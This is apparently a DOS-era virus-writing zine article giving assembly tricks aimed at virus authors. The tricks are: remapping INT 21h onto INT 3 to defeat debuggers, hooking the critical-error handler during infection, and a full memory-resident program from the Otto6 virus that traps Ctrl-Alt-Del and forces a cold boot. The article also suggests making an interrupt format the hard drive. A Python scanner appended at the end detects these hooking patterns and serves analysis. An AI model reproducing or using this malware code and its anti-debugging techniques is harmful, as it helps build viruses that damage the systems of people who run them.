
SOURCE00.008 - Programming Tricks

Published in Source · 25 Apr 2022

There are many possible tricks, but I won't get into all of them. The one thing that you really need to know is that no debugger will call interrupt 8, and only debuggers call interrupts 1 and 3. Using this knowledge, you should be able to come up with some interesting solutions to your problem of people trying to get at your source code.

Take this code for example:

        mov     ax, 3521h               ; Get the INT 21h address (DOS returns it in ES:BX)
        int     21h                     ; Do it!

        push    es                      ; Move the extra segment to the
        pop     ds                      ; data segment
        xchg    bx, dx                  ; Set up the INT 21h address in DS:DX
        mov     ax, 2503h               ; This will point the INT 3 vector at the INT 21h handler
        int     21h                     ; Do it!


It's the one I prefer to use. Anybody who actually knows anything will realize what you're doing and single-step over this code, but there are people who don't know what is going on, and who will consequently infect their system. This code has a double value. Not only will it fuck up the debugger when they try to trace through it, but it will also make your code smaller if you use interrupt 21h a lot. The reason is elementary: INT 21h is two bytes long ('CD 21'), but INT 3 is only one byte ('CC'). So, after this code, just use int 3 instead of int 21h. The setup code is 14 bytes in length, so if you use int 21h 15 times or more, the trick is definitely worth it.

Another trick deals with those annoying INT 24h critical errors (general error, etc.). If your virus is of such a nature that this may happen when someone runs the file, then use this code:

        mov     ax, 3524h               ; Get INT 24h address
        int     3h                      ; The 'old' INT 21h (aliased onto INT 3 above)

        push    cs                      ; The code needs CS = DS
        pop     ds
        lea     dx, [bp+INT24]          ; Set up the new INT 24h (address taken relative to BP)
        mov     ax, 2524h               ; Function 25h - set interrupt vector
        int     3h                      ; Do it!

INT24:
        mov     al, 3                   ; This is the new INT 24h: AL = 3 tells DOS to fail the call
        iret                            ; Interrupt return


You could also disable other interrupts, or have them do whatever you want. Maybe you want to set interrupt one to format the hard drive or something. Or, you could get creative, like this program:

        .model  tiny
        .code
        org     100h

begin:  mov     ah, 9                   ; Print the message
        mov     dx, offset logon        ; Load the message address
        int     21h                     ; Print it!

        mov     ax, 0B0B0h              ; Check to see if we're already in memory
        int     9                       ; The trapped vector
        cmp     cx, 0B0B0h              ; The check word
        jz      exit                    ; If we're in memory, then quit

        mov     ax, 3509h               ; Get the address for int 9
        int     21h                     ; Do it!

        mov     word ptr [old9+1], bx   ; Save the segment:offset
        mov     word ptr [old9+3], es   ; for later use

        mov     ax, 2509h               ; Set int vector
        mov     dx, offset int9         ; to OUR int 9
        int     21h                     ; Do it!

        mov     dx, offset endofit      ; Set last byte to keep in memory
        int     27h                     ; Go TSR

exit:   int     20h

int9:   cmp     ax, 0B0B0h              ; Function to check whether the TSR is resident
        jnz     cont                    ; If not that func, then continue
        xchg    ax, cx                  ; Set reg so we don't go TSR twice
        iret                            ; Return

cont:
        push    ax bx ds

        xor     ax, ax
        mov     ds, ax                  ; DS = 0, so ds:[0417h] is the BIOS shift-status byte
        in      al, 60h                 ; Get keyboard scan code
        mov     bl, byte ptr ds:[0417h] ; Get shift status
        test    bl, 08                  ; Alt pressed?
        jz      bye                     ; No
        test    bl, 04                  ; Ctrl pressed?
        jz      bye
        cmp     al, 53h                 ; Delete?
        jnz     bye                     ; Nope!
        and     bl, 0F3h                ; Mask off bits
        mov     byte ptr ds:[0417h], bl ; Place in BIOS
        jmp     ok                      ; Go on

bye:
        pop     ds bx ax                ; Restore registers
;       jmp     return                  ; more weird
        db      0E9h, 20h, 00           ; encoding!

ok:
        push    cs                      ; DS = CS
        pop     ds

        mov     ax, 3                   ; 80x25 text mode
        int     10h

        mov     ah, 2                   ; Set cursor position
        mov     bh, 0
        mov     dx, 0A14h               ; Row 10, column 20
        int     10h

        mov     si, offset ourbyte
looper:
        loop    looper                  ; Delay loop (CX counts down to 0)

        lodsb                           ; Load string byte

        cmp     al, 0                   ; End of string?
        je      coldbootus              ; Yes

        mov     ah, 0Eh                 ; Display char in AL
        int     10h

        jmp     looper

return:
old9    db      0EAh                    ; JMP FAR PTR
        dd      00000000                ; old INT 9h

ourbyte db      'Greetings to all viral writers!',0
logon   db      7,7,7,'I aM a CooLie!!!$'

coldbootus:
        mov     dx, 28h
        mov     ds, dx                  ; DS = 0028h
        mov     word ptr ds:[0072h], 0  ; DS:0072h = 0
        db      0EAh                    ; JMP FAR PTR
        db      00h, 00h, 0FFh, 0FFh    ; Cold boot vector FFFF:0000

endofit:
        end     begin



What it does is go memory resident, beep three times and print 'I aM a CooLie!!!' on the screen. When you press ALT-CTRL-DEL, it intercepts the keystroke, prints 'Greetings to all viral writers!', then does a cold boot. It was taken from the Otto6 virus, disassembled by The Additude Adjuster of Virulent Graffiti. There is no limit to what a virus can do; it's limited only by your imagination.

- Havoc
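All three fragments above (INT 21h aliased onto INT 3, the INT 24h hook, and the TSR's INT 9 hook) go through DOS function 35h/25h, which gives an analyst a cheap static signature for this family of tricks. The scanner below is an added example, not code from the zine or from Havoc; the sample images are the article's fragments hand-assembled with placeholder displacements, and the six-byte gap tolerance and vector names are this example's own choices.

```python
import re
from dataclasses import dataclass

# Vectors named in this article; any other vector is reported by number only.
VECTOR_NAMES = {0x01: "single-step", 0x03: "breakpoint", 0x09: "keyboard IRQ1",
                0x21: "DOS services", 0x24: "critical error"}

# mov ax,35NNh (get vector) / mov ax,25NNh (set vector) assembles to B8 NN 35 / B8 NN 25.
# Up to six bytes may sit between it and the trap (e.g. "mov dx,offset handler"); the
# trap is int 21h (CD 21) or, once INT 21h has been aliased onto INT 3, a lone CC.
_VECTOR_CALL = re.compile(rb"\xB8(.)([\x25\x35]).{0,6}?(\xCD\x21|\xCC)", re.DOTALL)

@dataclass
class VectorCall:
    offset: int
    op: str       # "get" or "set"
    vector: int
    via: str      # "int 21h" or "int 3"

def find_vector_calls(image: bytes) -> list[VectorCall]:
    """Return every get/set-vector DOS call found in a raw code image, in file order."""
    calls = []
    for m in _VECTOR_CALL.finditer(image):
        op = "get" if m.group(2) == b"\x35" else "set"
        via = "int 21h" if m.group(3) == b"\xCD\x21" else "int 3"
        calls.append(VectorCall(m.start(), op, m.group(1)[0], via))
    return calls

def assess(image: bytes) -> dict:
    """Summarise the hooking and anti-debug indicators the scanner can see."""
    calls = find_vector_calls(image)
    hooked = sorted({c.vector for c in calls if c.op == "set"})
    alias_at = next((c.offset for c in calls if c.op == "set" and c.vector == 0x03), None)
    # Once INT 21h is aliased onto INT 3, every lone CC byte may be a DOS call. CC can
    # also occur in data, so this count is a hint for an analyst, not proof on its own.
    cc_after = image.count(b"\xCC", alias_at) if alias_at is not None else 0
    return {"hooked_vectors": [f"{v:02X}h {VECTOR_NAMES.get(v, '?')}" for v in hooked],
            "dos_calls_via_int3": sum(c.via == "int 3" for c in calls),
            "int21_aliased_to_int3": alias_at is not None,
            "int3_opcodes_after_alias": cc_after}

# Constructed samples: the article's fragments hand-assembled. The label/displacement
# bytes (10 00, 00 01, 02 01, 20 01) are placeholders, not addresses from the page.
TRICK_INT21_TO_INT3 = bytes.fromhex("B8 21 35 CD 21 06 1F 87 DA B8 03 25 CD 21")
TRICK_INT24 = bytes.fromhex("B8 24 35 CC 0E 1F 8D 96 10 00 B8 24 25 CC B0 03 CF")
TSR_HOOK_INT9 = bytes.fromhex("B8 09 35 CD 21 89 1E 00 01 8C 06 02 01 B8 09 25 BA 20 01 CD 21")

if __name__ == "__main__":
    print(assess(TRICK_INT21_TO_INT3 + TRICK_INT24 + TSR_HOOK_INT9))
```

The first sample assembles to exactly the 14 bytes the article counts, so the break-even arithmetic in the text can be checked directly against `len(TRICK_INT21_TO_INT3)`.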
